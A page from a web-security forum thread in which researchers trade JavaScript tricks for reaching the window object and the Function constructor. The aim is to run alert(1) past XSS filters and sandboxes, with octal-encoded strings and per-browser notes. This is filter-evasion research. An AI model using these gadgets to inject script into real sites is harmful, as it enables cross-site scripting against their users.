Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Script obfuscation, filter evasion, IDS/IPS/WAF bypassing... this is where it should live. Because this topic is too big to live anywhere else. Phj33r! 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: Previous12
Current Page: 2 of 2
Re: Tricks for getting a reference to window
Posted by: superevr
Date: June 20, 2011 05:09PM

I'm not sure what everyone else is using these tricks for, but I found it to be a great way to evaluate octal strings. I needed some new tricks because our old favorite trick "[],[]['sort']()" is not working in the lastest versions of FireFox, and I was also in a situation where comma was not allowed.


So I grabbed some snippets of code from here and built a few code samples. Anything enclosed in '' can be replaced with it's octal equivalent.

'\141\154\145\162\164' = 'alert'


$['__parent__']['alert'](1) //Firebug Console in FF3.6 Only
(0,[]['sort'])()['alert'](1) //FF3.6, Chrome, IE9
1.['__parent__']['alert'](1) //FF3.6
([],[]['sort'])()['alert'](1) //Chrome, FF3.6, IE9
/_/['__parent__']['alert'](1) //FF3.6
$['constructor']('alert(1)')() //JQuery Chrome, IE8, IE9, FF4, FF3.6
(0,[]['valueOf'])()['alert'](1) //Chrome, FF3.6, IE9
(0,{}['valueOf'])()['alert'](1) //Chrome, FF3.6, IE9
(0||$['valueOf'])()['alert'](1) //JQuery Chrome, IE9, FF3.6
(1&&$['valueOf'])()['alert'](1) //JQuery Chrome, IE9, FF3.6
(1?$['valueOf']:0)()['alert'](1) //Jquery Chrome, IE9
[]['sort']['apply']()['alert'](1) //Chrome, FF3.6
(0,/0/(/0/)['sort'])()['alert'](1) //Chrome, FF3.6
('',/\//['valueOf'])()['alert'](1) //Chrome, IE9, FF3.6
(1?['']['valueOf']:0)()['alert'](1) //Chrome, IE9
''['big']['constructor']('alert(1)')() //FF4, FF3.6 IE8, IE9, Webkit
[]['map']['constructor']('alert(1)')() //FF3.6, FF4, Chrome, IE9
(1&&[]['valueOf'])()['alert'](1) //Chrome, IE9, FF3.6
/_/['test']['constructor']('alert(1)')() //FF3.6, FF4, Chrome, IE8, IE9
(0||['']['valueOf'])()['alert'](1) //FF3.6, IE9, Chrome
(0.['valueOf'])['constructor']('alert(1)')() //FF3.6, FF4, IE8, IE9, Chrome
1.['constructor']['constructor']('alert(1)')() //FF3.6, FF4, IE8, IE9, Chrome
(0)['constructor']['constructor']('alert(1)')() //FF3.6, FF4, IE8, IE9, Chrome
$='@mozilla.org/js/function';$::['alert'](1) //FF3.6, FF4

Options: ReplyQuote
Re: Tricks for getting a reference to window
Posted by: Gareth Heyes
Date: June 21, 2011 01:11PM

Good for breaking sandboxes too

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Tricks for getting a reference to window (rev 16)
Date: May 18, 2012 01:27AM

RuntimeObject("w*")["window"]["alert"](1); // IE

http://d.hatena.ne.jp/st4rdust/20120518/1337319251

--
Yosuke HASEGAWA
http://utf-8.jp/

Options: ReplyQuote
Pages: Previous12
Current Page: 2 of 2


Sorry, only registered users may post in this forum.